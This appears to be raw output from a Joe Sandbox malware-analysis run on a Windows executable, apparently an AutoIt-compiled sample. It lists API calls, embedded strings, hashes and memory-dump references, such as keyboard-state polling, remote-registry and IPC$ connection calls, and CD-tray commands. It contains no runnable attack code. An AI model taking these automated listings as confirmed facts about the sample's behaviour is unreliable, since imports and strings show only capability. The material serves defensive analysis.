                                                                        • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                                        APIs
                                                                          • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                          • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                        • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                        • API String ID: 1976180769-4113822522
                                                                        • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                        • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                                        • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                        • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                                        APIs
                                                                        Similarity
                                                                        • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                                        • String ID:
                                                                        • API String ID: 461458858-0
                                                                        • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                        • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                                        • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                        • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                                        • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                                        • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                                        • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                                        • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                                        • DeleteObject.GDI32(?), ref: 004301D0
                                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                                        Similarity
                                                                        • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                        • String ID:
                                                                        • API String ID: 3969911579-0
                                                                        • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                        • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                                        • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                        • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                                        APIs
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                                        • String ID: 0
                                                                        • API String ID: 956284711-4108050209
                                                                        • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                        • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                                        • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                        • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                                        APIs
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                        • String ID: 0.0.0.0
                                                                        • API String ID: 1965227024-3771769585
                                                                        • Opcode ID: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                                        • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                                        • Opcode Fuzzy Hash: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                                        • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                                        APIs
                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: SendString$_memmove_wcslen
                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                        • API String ID: 369157077-1007645807
                                                                        • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                        • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                                                        • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                        • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                                                        APIs
                                                                        • GetParent.USER32 ref: 00445BF8
                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                                        • __wcsicoll.LIBCMT ref: 00445C33
                                                                        • __wcsicoll.LIBCMT ref: 00445C4F
                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                        • API String ID: 3125838495-3381328864
                                                                        • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                        • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                                        • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                        • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                                        APIs
                                                                        • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                                        • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                                        • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                                        • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                                        • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                        Similarity
                                                                        • API ID: MessageSend$CharNext
                                                                        • String ID:
                                                                        • API String ID: 1350042424-0
                                                                        • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                        • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                                        • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                        • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                                        APIs
                                                                          • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                          • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                        • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                                        • _wcscpy.LIBCMT ref: 004787E5
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                        • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                        • API String ID: 3052893215-2127371420
                                                                        • Opcode ID: 036da06a49ec39ef49fd599b726bde4f16b1b0d6ce0cde1bf1ad5f3ef79650c7
                                                                        • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                                        • Opcode Fuzzy Hash: 036da06a49ec39ef49fd599b726bde4f16b1b0d6ce0cde1bf1ad5f3ef79650c7
                                                                        • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                                        APIs
                                                                        • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                        • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                                        • __swprintf.LIBCMT ref: 0045E7F7
                                                                        • _wprintf.LIBCMT ref: 0045E8B3
                                                                        • _wprintf.LIBCMT ref: 0045E8D7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                        • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                        • API String ID: 2295938435-2354261254
                                                                        APIs
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                        • String ID: %.15g$0x%p$False$True
                                                                        • API String ID: 3038501623-2263619337
                                                                        APIs
                                                                        • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                        • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                                        • __swprintf.LIBCMT ref: 0045E5F6
                                                                        • _wprintf.LIBCMT ref: 0045E6A3
                                                                        • _wprintf.LIBCMT ref: 0045E6C7
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                        • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                        • API String ID: 2295938435-8599901
                                                                        APIs
                                                                        • timeGetTime.WINMM ref: 00443B67
                                                                          • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                                        • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                                        • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00443BC8
                                                                        • SetActiveWindow.USER32(?), ref: 00443BEC
                                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                                        • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00443C22
                                                                        • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                                        • IsWindow.USER32(?), ref: 00443C3A
                                                                        • EndDialog.USER32(?,00000000), ref: 00443C4C
                                                                          • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                          • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                          • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                        • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                                        • String ID: BUTTON
                                                                        • API String ID: 1834419854-3405671355
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                                        • LoadStringW.USER32(00000000), ref: 00454040
                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                        • _wprintf.LIBCMT ref: 00454074
                                                                        • __swprintf.LIBCMT ref: 004540A3
                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                        • API String ID: 455036304-4153970271
                                                                        APIs
                                                                        • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                                        • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                                        • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                                        • _memmove.LIBCMT ref: 00467EB8
                                                                        • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                                        • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                                        • _memmove.LIBCMT ref: 00467F6C
                                                                        • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                                        • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                        • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                        • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                                        Similarity
                                                                        • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                                        • String ID:
                                                                        • API String ID: 2170234536-0
                                                                        APIs
                                                                        • GetKeyboardState.USER32(?), ref: 00453CE0
                                                                        • SetKeyboardState.USER32(?), ref: 00453D3B
                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                                        • GetKeyState.USER32(000000A0), ref: 00453D75
                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                                        • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                                        • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                                        • GetKeyState.USER32(00000011), ref: 00453DEF
                                                                        • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                                        • GetKeyState.USER32(00000012), ref: 00453E26
                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                                        • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                                        Similarity
                                                                        • API ID: State$Async$Keyboard
                                                                        • String ID:
                                                                        • API String ID: 541375521-0
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                                        • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                                        • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                                        • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                                        • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                                        • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                                        • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                                        • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                                        • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                                        Similarity
                                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                                        • String ID:
                                                                        • API String ID: 3096461208-0
APIs
• GetWindowLongW.USER32(?,000000F0), ref: 004714DC
• LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
• SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
• DeleteObject.GDI32(?), ref: 0047151E
• DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
• LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
• SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
• ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
• DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
• SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
• DeleteObject.GDI32(?), ref: 004715EA
• DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
Similarity
• API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
• String ID:
• API String ID: 3218148540-0
APIs
Similarity
• API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
• String ID:
• API String ID: 136442275-0
APIs
• _wcsncpy.LIBCMT ref: 00467490
• _wcsncpy.LIBCMT ref: 004674BC
  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
• _wcstok.LIBCMT ref: 004674FF
  • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
• _wcstok.LIBCMT ref: 004675B2
• GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
• _wcslen.LIBCMT ref: 00467793
• _wcscpy.LIBCMT ref: 00467641
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
• _wcslen.LIBCMT ref: 004677BD
• GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
  • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
Strings
Similarity
• API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
• String ID: X
• API String ID: 3104067586-3081909835
APIs
• GetClassNameW.USER32(?,?,00000400), ref: 00461056
• GetWindowTextW.USER32(?,?,00000400), ref: 00461092
• _wcslen.LIBCMT ref: 004610A3
• CharUpperBuffW.USER32(?,00000000), ref: 004610B1
• GetClassNameW.USER32(?,?,00000400), ref: 00461124
• GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
• GetClassNameW.USER32(?,?,00000400), ref: 004611A1
• GetClassNameW.USER32(?,?,00000400), ref: 004611D9
• GetWindowRect.USER32(?,?), ref: 00461248
  • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
Strings
Similarity
• API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
• String ID: ThumbnailClass
• API String ID: 4136854206-1241985126
APIs
• ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
• SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
• ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
• SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
• SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
• GetClientRect.USER32(?,?), ref: 00471A1A
• RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
• DestroyIcon.USER32(?), ref: 00471AF4
Strings
Similarity
• API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
• String ID: 2
• API String ID: 1331449709-450215437
APIs
• GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
• LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
• LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
• __swprintf.LIBCMT ref: 00460915
• __swprintf.LIBCMT ref: 0046092D
• _wprintf.LIBCMT ref: 004609E1
Strings
Similarity
• API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
• String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
• API String ID: 3054410614-2561132961
APIs
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
• CLSIDFromString.OLE32(?,?), ref: 004587B3
• RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
• RegCloseKey.ADVAPI32(?), ref: 004587C5
Strings
Similarity
• API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
• String ID: SOFTWARE\Classes\$\CLSID$\IPC$
• API String ID: 600699880-22481851
APIs
Strings
                                                                        Similarity
                                                                        • API ID: DestroyWindow
                                                                        • String ID: static
                                                                        • API String ID: 3375834691-2160076837
                                                                        • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                        • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                                        • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                        • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                                        • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$DriveType
                                                                        • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                                        • API String ID: 2907320926-3566645568
                                                                        • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                        • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                                        • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                        • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                                        APIs
                                                                          • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                        • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                                        • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                                        • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                                        • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                                        • DeleteObject.GDI32(00620000), ref: 00470A04
                                                                        • DestroyIcon.USER32(00720065), ref: 00470A1C
                                                                        • DeleteObject.GDI32(F788F480), ref: 00470A34
                                                                        • DestroyWindow.USER32(003A0043), ref: 00470A4C
                                                                        • DestroyIcon.USER32(?), ref: 00470A73
                                                                        • DestroyIcon.USER32(?), ref: 00470A81
                                                                        • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                                        • String ID:
                                                                        • API String ID: 1237572874-0
